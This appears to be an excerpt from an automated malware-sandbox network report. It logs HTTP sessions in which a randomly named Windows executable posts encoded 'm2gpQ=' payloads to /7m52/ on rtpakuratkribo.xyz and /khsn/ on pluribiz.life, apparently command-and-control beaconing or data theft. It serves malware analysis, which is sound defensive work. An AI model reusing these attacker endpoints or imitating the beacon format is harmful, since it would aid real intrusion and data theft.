52 74 54 55 41 2b 75 75 44 49 39 4e 78 61 57 37 41 51 50 43 32 66 4b 42 6d 38 42 36 33 4f 70 74 6b 4e 58 55 78 70 34 46 31 62 54 4d 57 30 78 58 61 4f 4d 31 45 76 79 6d 32 7a 65 34 72 50 36 4c 47 31 42 46 39 4b 74 37 38 42 2b 70 58 39 74 36 75 73 69 42 54 4c 31 61 48 70 36 6a 34 63 5a 41 64 46 43 32 39 36 61 75 7a 54 7a 6a 75 35 33 38 38 77 3d 3d Data Ascii: m2gpQ=HW3TOELLk8Vna+rsYg1+pdtxMOsEVwLOaNL3kQrxPnF8KTMSArnFBN8oRDvjaD8aw+Hq+PjoCUEGbpomKoi0JR8YHFPRYzzrRtTUA+uuDI9NxaW7AQPC2fKBm8B63OptkNXUxp4F1bTMW0xXaOM1Evym2ze4rP6LG1BF9Kt78B+pX9t6usiBTL1aHp6j4cZAdFC296auzTzju5388w==
Nov 12, 2024 07:55:22.274498940 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Tue, 12 Nov 2024 06:55:22 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
Nov 12, 2024 07:55:22.274524927 CET	316	IN	Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49976	66.29.146.173	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:55:24.163618088 CET	784	OUT	POST /7m52/ HTTP/1.1 Host: www.rtpakuratkribo.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.rtpakuratkribo.xyz Cache-Control: max-age=0 Content-Length: 238 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.rtpakuratkribo.xyz/7m52/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 48 57 33 54 4f 45 4c 4c 6b 38 56 6e 62 64 7a 73 64 42 31 2b 73 39 74 79 56 75 73 45 63 51 4c 4b 61 4e 48 33 6b 52 75 71 50 56 78 38 4b 32 67 53 42 76 7a 46 45 4e 38 6f 65 6a 76 71 56 6a 38 52 77 2b 4c 59 2b 4f 50 6f 43 55 41 47 62 73 73 6d 4b 62 4b 31 49 42 38 61 50 6c 50 54 48 44 7a 72 52 74 54 55 41 2b 71 45 44 4d 70 4e 78 71 6d 37 43 79 6e 46 31 66 4b 43 6c 38 42 36 7a 4f 70 70 6b 4e 58 32 78 6f 6c 71 31 5a 62 4d 57 30 42 58 61 63 30 30 65 2f 7a 4d 37 54 66 56 74 50 4b 50 4f 6e 46 39 39 63 68 6c 77 57 75 52 62 72 73 59 30 4f 75 74 4e 61 4e 68 44 72 65 56 76 36 45 31 66 45 47 75 77 59 75 50 73 6b 57 4a 6a 72 57 34 71 49 6d 69 63 2f 71 2b 50 33 6a 4c 36 75 77 66 59 54 6e 56 4e 76 51 3d Data Ascii: m2gpQ=HW3TOELLk8VnbdzsdB1+s9tyVusEcQLKaNH3kRuqPVx8K2gSBvzFEN8oejvqVj8Rw+LY+OPoCUAGbssmKbK1IB8aPlPTHDzrRtTUA+qEDMpNxqm7CynF1fKCl8B6zOppkNX2xolq1ZbMW0BXac00e/zM7TfVtPKPOnF99chlwWuRbrsY0OutNaNhDreVv6E1fEGuwYuPskWJjrW4qImic/q+P3jL6uwfYTnVNvQ=
Nov 12, 2024 07:55:24.852574110 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Tue, 12 Nov 2024 06:55:24 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
Nov 12, 2024 07:55:24.852590084 CET	316	IN	Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49977	66.29.146.173	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:55:26.709237099 CET	1797	OUT	POST /7m52/ HTTP/1.1 Host: www.rtpakuratkribo.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.rtpakuratkribo.xyz Cache-Control: max-age=0 Content-Length: 1250 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.rtpakuratkribo.xyz/7m52/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 48 57 33 54 4f 45 4c 4c 6b 38 56 6e 62 64 7a 73 64 42 31 2b 73 39 74 79 56 75 73 45 63 51 4c 4b 61 4e 48 33 6b 52 75 71 50 56 70 38 4b 67 30 53 41 49 66 46 44 4e 38 6f 58 44 76 76 56 6a 38 41 77 36 6e 63 2b 4f 7a 34 43 52 63 47 59 4f 6b 6d 4d 71 4b 31 43 42 38 61 44 46 50 51 59 7a 79 2f 52 74 44 51 41 2b 61 45 44 4d 70 4e 78 73 71 37 47 67 50 46 35 2f 4b 42 6d 38 42 32 33 4f 70 42 6b 4e 65 55 78 6f 78 41 31 70 37 4d 57 55 52 58 59 70 67 30 47 76 7a 4f 38 54 66 4e 74 50 48 52 4f 6e 5a 58 39 63 39 62 77 52 61 52 65 50 4a 45 77 66 47 45 52 5a 68 53 66 4a 43 74 67 37 51 59 66 6d 43 45 2b 49 2b 6f 79 48 69 57 71 4c 2f 30 76 6f 6e 32 4c 70 4b 59 42 44 44 37 32 61 59 50 4e 78 43 66 55 35 4a 66 6e 39 73 6e 61 42 38 62 6b 50 47 79 37 35 55 69 61 67 61 59 4f 6b 76 52 33 52 68 57 67 71 7a 30 74 63 70 72 56 64 6c 57 4f 6d 68 30 4f 6a 4d 55 5a 34 76 70 36 77 31 73 65 2f 46 54 2f 71 54 35 39 65 7a 50 78 48 44 33 63 4a 52 53 67 72 53 48 5a 4e 35 58 6a 76 42 67 45 6a 78 65 6e 77 2b 59 45 39 35 59 [TRUNCATED] Data Ascii: m2gpQ=HW3TOELLk8VnbdzsdB1+s9tyVusEcQLKaNH3kRuqPVp8Kg0SAIfFDN8oXDvvVj8Aw6nc+Oz4CRcGYOkmMqK1CB8aDFPQYzy/RtDQA+aEDMpNxsq7GgPF5/KBm8B23OpBkNeUxoxA1p7MWURXYpg0GvzO8TfNtPHROnZX9c9bwRaRePJEwfGERZhSfJCtg7QYfmCE+I+oyHiWqL/0von2LpKYBDD72aYPNxCfU5Jfn9snaB8bkPGy75UiagaYOkvR3RhWgqz0tcprVdlWOmh0OjMUZ4vp6w1se/FT/qT59ezPxHD3cJRSgrSHZN5XjvBgEjxenw+YE95Y9s/029lgnb9YjDGW8Dw+onyh15gLzYeB54PGtfdVyg5dGgt+8bn5jRiMnXtKfYpmrtUB6pT1VZNnD2dFTXUC/MSrI8wRVE/jt8IvQwv/f5I3i7FAy9ugtcyhV+wpaHFMMCX4vSFxlfOSgAtHe8xrEAtqMEOWOR1f5ZYjdzXbzKlTpctu+vhyxG+1ntSRS92HaWCdPBv+93iKaHfTXQAGIS8w94P2znSfJaKX015zRwl5XIxe5bOBKgFtiexFSCLqB+NSgEuhcdDIHec9jqYQpk64RJpSuzhZaD4XY97u4gMM1FSpNSrkDLZZC8WZhiGLnWsx/gGnJrZcv4dd9obQ1JlfwkiKYtcIVhYuh2ueoBcq/70Vs7GwHsRNMaPxsmK6Yqgv2q3XcXxG1te8fMWV/fK0sSxeT4lr4D6iUaGwiqf1unm95r9K6WR4VLMgITz4eqW3QmWok4wXjmFxSwgOuxNFJ5deqr9utJ/f7kBuQad7VMBpJBP+O2tJ3EkporZDYGy2//M7Cf2BR/Quf+uoEoZPBUaaPSySsdi8hCMFO7cW4S9OAxPDd7K7BmQknRxbv1lqLkFofVlcWat6G+co/jT1vP/4vBqHnwXWWXhNDlWesRRl4SbYpP7xVzHqFnnvW6b9txMBAh622bGkBjE1lA1c/EvwixgUUq [TRUNCATED]
Nov 12, 2024 07:55:27.360965967 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Tue, 12 Nov 2024 06:55:27 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
Nov 12, 2024 07:55:27.360986948 CET	316	IN	Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49978	66.29.146.173	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:55:29.469578028 CET	497	OUT	GET /7m52/?m2gpQ=KUfzNxzC0/tkF/Sfag5rxehoMO8NdG75VoGUrTTYHgYMfDszE7nAAPd4WyzgZAEusu3dyfDqSmUHPfAxKZywGgYzE1+gbAbmefiRMJeaIMpM+K6CCyvQgZeaisFx9/9ei8/+pPx29LDH&KjH=KRIxdVHP60TD8 HTTP/1.1 Host: www.rtpakuratkribo.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Nov 12, 2024 07:55:30.040954113 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Tue, 12 Nov 2024 06:55:29 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
Nov 12, 2024 07:55:30.040976048 CET	316	IN	Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49979	209.74.64.58	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:55:35.358331919 CET	749	OUT	POST /khsn/ HTTP/1.1 Host: www.pluribiz.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.pluribiz.life Cache-Control: max-age=0 Content-Length: 218 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.pluribiz.life/khsn/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 65 56 72 66 2b 71 68 4c 63 35 77 6e 4f 50 77 73 79 34 6f 41 77 52 49 73 76 70 75 6e 7a 63 7a 45 70 6e 46 7a 50 4a 2f 4e 4c 4d 75 71 79 64 42 6f 47 4e 46 33 2f 78 53 50 7a 5a 65 4e 70 78 35 57 5a 64 70 71 78 2f 59 47 6c 37 43 35 61 77 49 68 6b 31 67 42 45 31 4c 68 2b 65 52 51 47 73 65 7a 43 73 67 71 4c 48 4a 4e 44 6c 4a 32 55 70 31 6d 39 6e 42 2b 4b 51 6a 39 6c 72 79 47 4a 69 52 6f 70 30 5a 48 6d 52 48 6a 67 49 39 6e 67 55 72 34 46 66 64 4f 7a 2f 70 50 68 55 74 7a 62 49 75 77 75 79 67 72 6e 6e 4a 4d 54 76 2b 59 34 63 76 58 77 46 77 41 4f 6c 49 65 53 5a 6c 34 50 6a 68 32 56 50 68 74 30 44 63 36 68 51 44 78 64 65 53 55 4c 41 3d 3d Data Ascii: m2gpQ=eVrf+qhLc5wnOPwsy4oAwRIsvpunzczEpnFzPJ/NLMuqydBoGNF3/xSPzZeNpx5WZdpqx/YGl7C5awIhk1gBE1Lh+eRQGsezCsgqLHJNDlJ2Up1m9nB+KQj9lryGJiRop0ZHmRHjgI9ngUr4FfdOz/pPhUtzbIuwuygrnnJMTv+Y4cvXwFwAOlIeSZl4Pjh2VPht0Dc6hQDxdeSULA==
Nov 12, 2024 07:55:36.012614965 CET	533	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 06:55:35 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49980	209.74.64.58	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:55:37.902477026 CET	769	OUT	POST /khsn/ HTTP/1.1 Host: www.pluribiz.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.pluribiz.life Cache-Control: max-age=0 Content-Length: 238 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.pluribiz.life/khsn/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 65 56 72 66 2b 71 68 4c 63 35 77 6e 4e 76 67 73 2b 35 6f 41 68 68 49 76 71 70 75 6e 36 38 7a 49 70 6e 5a 7a 50 4d 61 4b 4d 2f 47 71 7a 34 6c 6f 48 4d 46 33 79 52 53 50 71 70 65 49 6a 52 35 52 5a 64 6c 55 78 2b 6b 47 6c 2f 53 35 61 31 73 68 6c 43 55 47 45 6c 4c 76 6e 4f 52 53 5a 63 65 7a 43 73 67 71 4c 48 73 57 44 6c 78 32 55 59 46 6d 39 47 42 39 48 77 6a 2b 73 4c 79 47 43 43 52 73 70 30 5a 66 6d 51 61 30 67 4f 35 6e 67 52 58 34 47 4b 68 4a 6f 50 70 56 6c 55 74 73 57 34 33 75 75 78 41 71 6c 68 56 76 61 6f 4f 72 77 4b 75 31 71 6e 38 73 51 30 77 6c 57 62 42 4f 59 46 38 44 58 4f 6c 31 35 68 6f 62 2b 6e 6d 62 51 4d 7a 51 64 7a 6f 71 54 61 6d 73 69 50 50 6f 6c 57 70 42 77 71 38 4b 45 71 45 3d Data Ascii: m2gpQ=eVrf+qhLc5wnNvgs+5oAhhIvqpun68zIpnZzPMaKM/Gqz4loHMF3yRSPqpeIjR5RZdlUx+kGl/S5a1shlCUGElLvnORSZcezCsgqLHsWDlx2UYFm9GB9Hwj+sLyGCCRsp0ZfmQa0gO5ngRX4GKhJoPpVlUtsW43uuxAqlhVvaoOrwKu1qn8sQ0wlWbBOYF8DXOl15hob+nmbQMzQdzoqTamsiPPolWpBwq8KEqE=
